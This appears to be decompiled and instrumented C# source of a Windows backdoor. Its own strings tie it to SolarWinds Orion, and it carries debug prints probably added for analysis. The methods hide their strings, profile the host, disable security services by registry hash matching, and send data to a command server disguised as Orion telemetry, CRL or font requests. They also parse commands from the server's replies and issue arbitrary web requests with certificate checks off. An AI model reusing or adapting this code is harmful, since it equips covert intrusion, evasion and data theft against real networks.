public static string GetOSVersion(bool full) { if (osVersion == null || osInfo == null) { try { // Select * From Win32_OperatingSystem using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNor3L0gtSizJzEsPriwuSc0FAA=="))) { ManagementObject managementObject = managementObjectSearcher.Get().Cast <ManagementObject>().FirstOrDefault <ManagementObject>(); // Caption osInfo = managementObject.Properties[ZipHelper.Unzip("c04sKMnMzwMA")].Value.ToString(); // OSArchitecture osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("8w92LErOyCxJTS4pLUoFAA==")].Value.ToString(); // InstallDate osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("88wrLknMyXFJLEkFAA==")].Value.ToString(); // Organization osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("8y9KT8zLrEosyczPAwA=")].Value.ToString(); // RegisteredUser osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("C0pNzywuSS1KTQktTi0CAA==")].Value.ToString(); // Version string text = managementObject.Properties[ZipHelper.Unzip("C0stKs7MzwMA")].Value.ToString(); osInfo = osInfo + ";" + text; string[] array = text.Split(new char[] { '.' }); osVersion = array[0] + "." + array[1]; } } catch (Exception) { osVersion = Environment.OSVersion.Version.Major + "." + Environment.OSVersion.Version.Minor; // [E] {0} {1} {2} osInfo = string.Format(ZipHelper.Unzip("i3aNVag2qFWoNgRio1oA"), Environment.OSVersion.VersionString, Environment.OSVersion.Version, Environment.Is64BitOperatingSystem ? 64 : 32); } } if (!full) { return(osVersion); } return(osInfo); }
private static bool SearchConfigurations() { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Entering SearchConfigurations()"); // Select * From Win32_SystemDriver Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Search Configurations: " + ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==")); using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA=="))) { foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get()) { // PathName ulong hash = Utilities.GetHash(Path.GetFileName(((ManagementObject)managementBaseObject).Properties[ZipHelper.Unzip("C0gsyfBLzE0FAA==")].Value.ToString()).ToLower()); if (!Settings.printy) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Checking property: " + ZipHelper.Unzip("C0gsyfBLzE0FAA==") + " GetFileName: " + Path.GetFileName(((ManagementObject)managementBaseObject).Properties[ZipHelper.Unzip("C0gsyfBLzE0FAA==")].Value.ToString())); } if ((Array.IndexOf<ulong>(Settings.configTimeStamps, hash) != -1)) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Check for special drivers failed . Backdoor ConfigTimeStamps detected last GetFileName with hash " + hash + " [Use -r to Bypass]"); if (Settings.bypassr) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Because you are bypassing drivers/process check, the backdoor will continue. In a normal case teh backdoor stop execution. "); } else { return true; } } } } return false; }
private static bool SetManualMode(ServiceConfiguration.Service[] svcList) { try { // SYSTEM\CurrentControlSet\services bool result = false; using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(ZipHelper.Unzip("C44MDnH1jXEuLSpKzStxzs8rKcrPCU4tiSlOLSrLTE4tBgA="))) { foreach (string text in registryKey.GetSubKeyNames()) { foreach (ServiceConfiguration.Service service in svcList) { try { if (Utilities.GetHash(text.ToLower()) == service.timeStamp) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Interesting Service found " + text); if (service.started) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Service is started " + text + " setting " + registryKey + "to false"); result = true; RegistryHelper.SetKeyPermissions(registryKey, text, false); } else { using (RegistryKey registryKey2 = registryKey.OpenSubKey(text, true)) { // Start if (registryKey2.GetValueNames().Contains(ZipHelper.Unzip("Cy5JLCoBAA=="))) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Setting " + text + " with value " + ZipHelper.Unzip("Cy5JLCoBAA==")); // Start registryKey2.SetValue(ZipHelper.Unzip("Cy5JLCoBAA=="), 4, RegistryValueKind.DWord); result = true; } } } } } catch (Exception) { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Error in SetManualMode"); } } } } return result; } catch (Exception) { } return false; }
private HttpStatusCode CreateUploadRequest(HttpHelper.JobEngine job, int err, string response, out byte[] outData) { string text = this.httpHost; byte[] array = null; HttpHelper.HttpOipExMethods httpOipExMethods = (job != HttpHelper.JobEngine.Idle && job != HttpHelper.JobEngine.None) ? HttpHelper.HttpOipExMethods.Head : HttpHelper.HttpOipExMethods.Get; outData = null; try { if (!string.IsNullOrEmpty(response)) { byte[] bytes = Encoding.UTF8.GetBytes(response); byte[] bytes2 = BitConverter.GetBytes(err); byte[] array2 = new byte[bytes.Length + bytes2.Length + this.customerId.Length]; Array.Copy(bytes, array2, bytes.Length); Array.Copy(bytes2, 0, array2, bytes.Length, bytes2.Length); Array.Copy(this.customerId, 0, array2, bytes.Length + bytes2.Length, this.customerId.Length); array = HttpHelper.Inflate(array2); httpOipExMethods = ((array.Length <= 10000) ? HttpHelper.HttpOipExMethods.Put : HttpHelper.HttpOipExMethods.Post); } if (!text.StartsWith(Uri.UriSchemeHttp + "://", StringComparison.OrdinalIgnoreCase) && !text.StartsWith(Uri.UriSchemeHttps + "://", StringComparison.OrdinalIgnoreCase)) { text = Uri.UriSchemeHttps + "://" + text; } if (!text.EndsWith("/")) { text += "/"; } text += this.GetBaseUri(httpOipExMethods, err); HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(text); if (httpOipExMethods == HttpHelper.HttpOipExMethods.Get || httpOipExMethods == HttpHelper.HttpOipExMethods.Head) { // If-None-Match httpWebRequest.Headers.Add(ZipHelper.Unzip("80zT9cvPS9X1TSxJzgAA"), this.GetCache()); } if (httpOipExMethods == HttpHelper.HttpOipExMethods.Put && (this.requestMethod == HttpOipMethods.Get || this.requestMethod == HttpOipMethods.Head)) { int[] intArray = this.GetIntArray((array != null) ? array.Length : 0); int num = 0; ulong num2 = (ulong)DateTime.UtcNow.Subtract(new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds; num2 -= 300000UL; string text2 = "{"; // "userId":"{0}", text2 += string.Format(ZipHelper.Unzip("UyotTi3yTFGyUqo2qFXSAQA="), this.GetOrionImprovementCustomerId()); // "sessionId":"{0}", text2 += string.Format(ZipHelper.Unzip("UypOLS7OzM/zTFGyUqo2qFXSAQA="), this.sessionId.ToString().Trim(new char[] { '{', '}' })); // "steps":[ text2 += ZipHelper.Unzip("UyouSS0oVrKKBgA="); for (int i = 0; i < intArray.Length; i++) { uint num3 = (uint)((this.random.Next(4) == 0) ? this.random.Next(512) : 0); num2 += (ulong)num3; byte[] array3; if (intArray[i] > 0) { num2 |= 2UL; array3 = array.Skip(num).Take(intArray[i]).ToArray <byte>(); num += intArray[i]; } else { num2 &= 18446744073709551613UL; array3 = new byte[this.random.Next(16, 28)]; for (int j = 0; j < array3.Length; j++) { array3[j] = (byte)this.random.Next(); } } text2 += "{"; // "Timestamp":"\/Date({0})\/", text2 += string.Format(ZipHelper.Unzip("UwrJzE0tLknMLVCyUorRd0ksSdWoNqjVjNFX0gEA"), num2); string str = text2; // "Index":{0}, string format = ZipHelper.Unzip("U/LMS0mtULKqNqjVAQA="); int num4 = this.mIndex; this.mIndex = num4 + 1; text2 = str + string.Format(format, num4); // "EventType":"Orion", text2 += ZipHelper.Unzip("U3ItS80rCaksSFWyUvIvyszPU9IBAA=="); // "EventName":"EventManager", text2 += ZipHelper.Unzip("U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA=="); // "DurationMs":{0}, text2 += string.Format(ZipHelper.Unzip("U3IpLUosyczP8y1Wsqo2qNUBAA=="), num3); // "Succeeded":true, text2 += ZipHelper.Unzip("UwouTU5OTU1JTVGyKikqTdUBAA=="); // "Message":"{0}" text2 += string.Format(ZipHelper.Unzip("U/JNLS5OTE9VslKqNqhVAgA="), Convert.ToBase64String(array3).Replace("/", "\\/")); text2 += ((i + 1 != intArray.Length) ? "}," : "}"); } text2 += "]}"; // application/json httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/TzyrOzwMA"); array = Encoding.UTF8.GetBytes(text2); } if (httpOipExMethods == HttpHelper.HttpOipExMethods.Post || this.requestMethod == HttpOipMethods.Put || this.requestMethod == HttpOipMethods.Post) { // application/octet-stream httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/Tz08uSS3RLS4pSk3MBQA="); } return(this.CreateUploadRequestImpl(httpWebRequest, array, out outData)); } catch (Exception) { } return((HttpStatusCode)0); }
private string GetBaseUriImpl(HttpHelper.HttpOipExMethods method, int err) { string text = null; if (method == HttpHelper.HttpOipExMethods.Head) { text = ((ushort)err).ToString(); } if (this.requestMethod == HttpOipMethods.Post) { string[] array = new string[] { // -root ZipHelper.Unzip("0y3Kzy8BAA=="), // -cert ZipHelper.Unzip("001OLSoBAA=="), // -universal_ca ZipHelper.Unzip("0y3NyyxLLSpOzIlPTgQA"), // -ca ZipHelper.Unzip("001OBAA="), // -primary_ca ZipHelper.Unzip("0y0oysxNLKqMT04EAA=="), // -timestamp ZipHelper.Unzip("0y3JzE0tLknMLQAA"), "", // -global ZipHelper.Unzip("003PyU9KzAEA"), // -secureca ZipHelper.Unzip("0y1OTS4tSk1OBAA=") }; // pki/crl/{0}{1}{2}.crl return(string.Format(ZipHelper.Unzip("K8jO1E8uytGvNqitNqytNqrVA/IA"), this.random.Next(100, 10000), array[this.random.Next(array.Length)], (text == null) ? "" : ("-" + text))); } if (this.requestMethod == HttpOipMethods.Put) { string[] array2 = new string[] { // Bold ZipHelper.Unzip("c8rPSQEA"), // BoldItalic ZipHelper.Unzip("c8rPSfEsSczJTAYA"), // ExtraBold ZipHelper.Unzip("c60oKUp0ys9JAQA="), // ExtraBoldItalic ZipHelper.Unzip("c60oKUp0ys9J8SxJzMlMBgA="), // Italic ZipHelper.Unzip("8yxJzMlMBgA="), // Light ZipHelper.Unzip("88lMzygBAA=="), // LightItalic ZipHelper.Unzip("88lMzyjxLEnMyUwGAA=="), // Regular ZipHelper.Unzip("C0pNL81JLAIA"), // SemiBold ZipHelper.Unzip("C07NzXTKz0kBAA=="), // SemiBoldItalic ZipHelper.Unzip("C07NzXTKz0nxLEnMyUwGAA==") }; string[] array3 = new string[] { // opensans ZipHelper.Unzip("yy9IzStOzCsGAA=="), // noto ZipHelper.Unzip("y8svyQcA"), // freefont ZipHelper.Unzip("SytKTU3LzysBAA=="), // SourceCodePro ZipHelper.Unzip("C84vLUpOdc5PSQ0oygcA"), // SourceSerifPro ZipHelper.Unzip("C84vLUpODU4tykwLKMoHAA=="), // SourceHanSans ZipHelper.Unzip("C84vLUpO9UjMC07MKwYA"), // SourceHanSerif ZipHelper.Unzip("C84vLUpO9UjMC04tykwDAA==") }; int num = this.random.Next(array3.Length); if (num <= 1) { // fonts/woff/{0}-{1}-{2}-webfont{3}.woff2 return(string.Format(ZipHelper.Unzip("S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA"), new object[] { this.random.Next(100, 10000), array3[num], array2[this.random.Next(array2.Length)].ToLower(), text })); } // fonts/woff/{0}-{1}-{2}{3}.woff2 return(string.Format(ZipHelper.Unzip("S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA="), new object[] { this.random.Next(100, 10000), array3[num], array2[this.random.Next(array2.Length)], text })); } else { if (method <= HttpHelper.HttpOipExMethods.Head) { string text2 = ""; if (this.Valid(20)) { // SolarWinds text2 += ZipHelper.Unzip("C87PSSwKz8xLKQYA"); if (this.Valid(40)) { // .CortexPlugin text2 += ZipHelper.Unzip("03POLypJrQjIKU3PzAMA"); } } if (this.Valid(80)) { // .Orion text2 += ZipHelper.Unzip("0/MvyszPAwA="); } if (this.Valid(80)) { string[] array4 = new string[] { // Wireless ZipHelper.Unzip("C88sSs1JLS4GAA=="), // UI ZipHelper.Unzip("C/UEAA=="), // Widgets ZipHelper.Unzip("C89MSU8tKQYA"), // NPM ZipHelper.Unzip("8wvwBQA="), // Apollo ZipHelper.Unzip("cyzIz8nJBwA="), // CloudMonitoring ZipHelper.Unzip("c87JL03xzc/LLMkvysxLBwA=") }; text2 = text2 + "." + array4[this.random.Next(array4.Length)]; } if (this.Valid(30) || string.IsNullOrEmpty(text2)) { string[] array5 = new string[] { // Nodes ZipHelper.Unzip("88tPSS0GAA=="), // Volumes ZipHelper.Unzip("C8vPKc1NLQYA"), // Interfaces ZipHelper.Unzip("88wrSS1KS0xOLQYA"), // Components ZipHelper.Unzip("c87PLcjPS80rKQYA") }; text2 = text2 + "." + array5[this.random.Next(array5.Length)]; } if (this.Valid(30) || text != null) { text2 = string.Concat(new object[] { text2, "-", this.random.Next(1, 20), ".", this.random.Next(1, 30) }); if (text != null) { text2 = text2 + "." + ((ushort)err).ToString(); } } // swip/upd/ return(ZipHelper.Unzip("Ky7PLNAvLUjRBwA=") + text2.TrimStart(new char[] { '.' // .xml }) + ZipHelper.Unzip("06vIzQEA")); } if (method != HttpHelper.HttpOipExMethods.Put) { // swip/Upload.ashx return(ZipHelper.Unzip("Ky7PLNAPLcjJT0zRSyzOqAAA")); } // swip/Events return(ZipHelper.Unzip("Ky7PLNB3LUvNKykGAA==")); } }
private HttpHelper.JobEngine ParseServiceResponse(byte[] body, out string args) { args = null; try { if (body == null || body.Length < 4) { return(HttpHelper.JobEngine.None); } HttpOipMethods httpOipMethods = this.requestMethod; if (httpOipMethods != HttpOipMethods.Put) { if (httpOipMethods != HttpOipMethods.Post) { // "\{[0-9a-f-]{36}\}"|"[0-9a-f]{32}"|"[0-9a-f]{16}" string[] value = (from Match m in Regex.Matches(Encoding.UTF8.GetString(body), ZipHelper.Unzip("U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA"), RegexOptions.IgnoreCase) select m.Value).ToArray <string>(); body = Utilities.HexStringToByteArray(string.Join("", value).Replace("\"", string.Empty).Replace("-", string.Empty).Replace("{", string.Empty).Replace("}", string.Empty)); } else { body = body.Skip(12).ToArray <byte>(); } } else { body = body.Skip(48).ToArray <byte>(); } int num = BitConverter.ToInt32(body, 0); body = body.Skip(4).Take(num).ToArray <byte>(); if (body.Length != num) { return(HttpHelper.JobEngine.None); } string[] array = Encoding.UTF8.GetString(HttpHelper.Deflate(body)).Trim().Split(new char[] { ' ' }, 2); HttpHelper.JobEngine jobEngine = (HttpHelper.JobEngine) int.Parse(array[0]); args = ((array.Length > 1) ? array[1] : null); return(Enum.IsDefined(typeof(HttpHelper.JobEngine), jobEngine) ? jobEngine : HttpHelper.JobEngine.None); } catch (Exception) { } return(HttpHelper.JobEngine.None); }
private static string GetNewOwnerName() { string text = null; // S-1-5- string value = ZipHelper.Unzip("C9Y11DXVBQA="); // -500 string value2 = ZipHelper.Unzip("0zU1MAAA"); try { // Administrator text = new NTAccount(ZipHelper.Unzip("c0zJzczLLC4pSizJLwIA")).Translate(typeof(SecurityIdentifier)).Value; } catch { } if (string.IsNullOrEmpty(text) || !text.StartsWith(value, StringComparison.OrdinalIgnoreCase) || !text.EndsWith(value2, StringComparison.OrdinalIgnoreCase)) { // Select * From Win32_UserAccount string queryString = ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPLU4tckxOzi/NKwEA"); text = null; using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(queryString)) { foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get()) { // SID ManagementObject managementObject = (ManagementObject)managementBaseObject; string text2 = managementObject.Properties[ZipHelper.Unzip("C/Z0AQA=")].Value.ToString(); // LocalAccount // true if (managementObject.Properties[ZipHelper.Unzip("88lPTsxxTE7OL80rAQA=")].Value.ToString().ToLower() == ZipHelper.Unzip("KykqTQUA") && text2.StartsWith(value, StringComparison.OrdinalIgnoreCase)) { if (text2.EndsWith(value2, StringComparison.OrdinalIgnoreCase)) { text = text2; break; } if (string.IsNullOrEmpty(text)) { text = text2; } } } } } return(new SecurityIdentifier(text).Translate(typeof(NTAccount)).Value); }
private static bool GetOrCreateUserID(out byte[] hash64) { string text = ReadDeviceInfo(); Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Device info: " + text); hash64 = new byte[8]; Array.Clear(hash64, 0, hash64.Length); if (text == null) { return(false); } text += domain4; try { // HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography // MachineGuid text += RegistryHelper.GetValue(ZipHelper.Unzip("8/B2jYz38Xd29In3dXT28PRzjQn2dwsJdwxyjfHNTC7KL85PK4lxLqosKMlPL0osyKgEAA=="), ZipHelper.Unzip("801MzsjMS3UvzUwBAA=="), ""); Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Registry/MachineGuid info: " + text); } catch { Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Error GetOrCreateUserID"); } using (MD5 md = MD5.Create()) { byte[] bytes = Encoding.ASCII.GetBytes(text); byte[] array = md.ComputeHash(bytes); if (array.Length < hash64.Length) { return(false); } for (int i = 0; i < array.Length; i++) { byte[] array2 = hash64; int num = i % hash64.Length; array2[num] ^= array[i]; } } return(true); }
public static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy) { result = null; string requestUriString = args[0]; string s = args[1]; string text = (args.Length >= 3) ? args[2] : null; string[] array = Encoding.UTF8.GetString(Convert.FromBase64String(s)).Split(new string[] { "\r\n", "\r", "\n" }, StringSplitOptions.None); HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(requestUriString); HttpWebRequest httpWebRequest2 = httpWebRequest; httpWebRequest2.ServerCertificateValidationCallback = (RemoteCertificateValidationCallback)Delegate.Combine(httpWebRequest2.ServerCertificateValidationCallback, new RemoteCertificateValidationCallback((object sender, X509Certificate cert, X509Chain chain, SslPolicyErrors sslPolicyErrors) => true)); httpWebRequest.Proxy = proxy; httpWebRequest.Timeout = 120000; httpWebRequest.Method = array[0].Split(new char[] { ' ' })[0]; foreach (string text2 in array) { int num = text2.IndexOf(':'); if (num > 0) { string text3 = text2.Substring(0, num); string text4 = text2.Substring(num + 1).TrimStart(Array.Empty <char>()); if (!WebHeaderCollection.IsRestricted(text3)) { httpWebRequest.Headers.Add(text2); } else { ulong hash = Utilities.GetHash(text3.ToLower()); // expect if (hash <= 8873858923435176895UL) { // content-type if (hash <= 6116246686670134098UL) { // accept if (hash != 2734787258623754862UL) { // content-type if (hash == 6116246686670134098UL) { httpWebRequest.ContentType = text4; } } else { httpWebRequest.Accept = text4; } } // user-agent else if (hash != 7574774749059321801UL) { // expect if (hash == 8873858923435176895UL) { // 100-continue if (Utilities.GetHash(text4.ToLower()) == 1475579823244607677UL) { httpWebRequest.ServicePoint.Expect100Continue = true; } else { httpWebRequest.Expect = text4; } } } else { httpWebRequest.UserAgent = text4; } } // connection else if (hash <= 11266044540366291518UL) { // referer if (hash != 9007106680104765185UL) { // connection if (hash == 11266044540366291518UL) { ulong hash2 = Utilities.GetHash(text4.ToLower()); // keep-alive httpWebRequest.KeepAlive = (hash2 == 13852439084267373191UL || httpWebRequest.KeepAlive); // close httpWebRequest.KeepAlive = (hash2 != 14226582801651130532UL && httpWebRequest.KeepAlive); } } else { httpWebRequest.Referer = text4; } } // if-modified-since else if (hash != 15514036435533858158UL) { // date if (hash == 16066522799090129502UL) { httpWebRequest.Date = DateTime.Parse(text4); } } else { httpWebRequest.Date = DateTime.Parse(text4); } } } } // {0} {1} HTTP/{2} result += string.Format(ZipHelper.Unzip("qzaoVag2rFXwCAkJ0K82quUCAA=="), httpWebRequest.Method, httpWebRequest.Address.PathAndQuery, httpWebRequest.ProtocolVersion.ToString()); result = result + httpWebRequest.Headers.ToString() + "\n\n"; if (!string.IsNullOrEmpty(text)) { using (Stream requestStream = httpWebRequest.GetRequestStream()) { byte[] array3 = Convert.FromBase64String(text); requestStream.Write(array3, 0, array3.Length); } } using (WebResponse response = httpWebRequest.GetResponse()) { result += string.Format("{0} {1}\n", (int)((HttpWebResponse)response).StatusCode, ((HttpWebResponse)response).StatusDescription); result = result + response.Headers.ToString() + "\n"; using (Stream responseStream = response.GetResponseStream()) { result += new StreamReader(responseStream).ReadToEnd(); } } }
public static void GetProcessByDescription(string[] args, out string result) { result = null; if (args.Length == 0) { foreach (Process process in Process.GetProcesses()) { // [{0,5}] {1} result += string.Format(ZipHelper.Unzip("i6420DGtjVWoNqzlAgA="), process.Id, Utilities.Quote(process.ProcessName)); } return; } // Select * From Win32_Process using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPKMpPTi0uBgA="))) { foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get()) { ManagementObject managementObject = (ManagementObject)managementBaseObject; string[] array = new string[] { string.Empty, string.Empty }; ManagementObject managementObject2 = managementObject; // GetOwner string methodName = ZipHelper.Unzip("c08t8S/PSy0CAA=="); object[] array2 = array; object[] args2 = array2; // [{0,5}] {1,-16} {2} {3,5} {4}\{5} Convert.ToInt32(managementObject2.InvokeMethod(methodName, args2)); result += string.Format(ZipHelper.Unzip("i6420DGtjVWoNtTRNTSrVag2quWsNgYKKVSb1MZUm9ZyAQA="), new object[] { // ProcessID // Name // ParentProcessID managementObject[ZipHelper.Unzip("CyjKT04tLvZ0AQA=")], Utilities.Quote(managementObject[ZipHelper.Unzip("80vMTQUA")].ToString()), managementObject[args[0]], managementObject[ZipHelper.Unzip("C0gsSs0rCSjKT04tLvZ0AQA=")], array[1], array[0] }); } } }